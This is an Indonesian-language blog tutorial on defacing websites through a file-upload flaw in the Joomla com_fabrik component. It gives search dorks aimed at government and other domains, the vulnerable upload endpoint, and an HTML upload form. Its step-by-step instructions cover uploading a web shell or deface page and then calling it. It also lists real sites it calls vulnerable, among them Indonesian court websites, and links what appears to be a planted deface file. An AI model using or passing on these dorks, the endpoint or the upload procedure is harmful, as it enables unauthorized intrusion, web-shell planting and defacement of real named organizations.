Deface Com Fabrik Upload with Csrf
Cara Deface Com Fabrik Vuln Upload With Csrf
Sebenernya ini ga beda jauh sama Depface Com Fabrik Biasa..bedanya hanya make Csrf:v
-Dork:
inurl:/com_fabrik site:go.id
inurl:importcsv.php site:inurl:viewTable?cid= site:com
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:.dk
inurl:index.php?option=com_fabrik&view= site:id
(Kembangin Lagi:v)
-Exploit:
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Csrf:
<html>
<head>
<title>CSRF</title>
<body style="color: white; background-color:black;">
<b>
<center>
<form method="POST" action="https://www.target.com/new/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file">
<button>Upload</button>
</form> </font>
</center>
Langkah-Langkah:
1.Dorking Lah:v Seperti Biasa
2.Cari Web Yg Vuln Lalu Tambahkan Exploit Di belakang
Contoh: https://www.target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
3.Lalu Buka Csrf Yang Sudah Kalian Siapkan
4.Tinggal Up Shell atau Html:v Ezz Bukan
jika terupload tampilanya seperti ini
5.Lalu Panggil Shell/Sc Mu
Misalnya Gw:v
https://www.pn-maros.go.id/new/r.html
Web Yg Vuln:v
http://www.pn-jeneponto.go.id
https://www.pn-maros.go.id
http://www.zambianacmisonline.org
https://res.torontocentre.org
http://pn-kebumen.go.id/
Belum ada Komentar untuk "Deface Com Fabrik Upload with Csrf"
Posting Komentar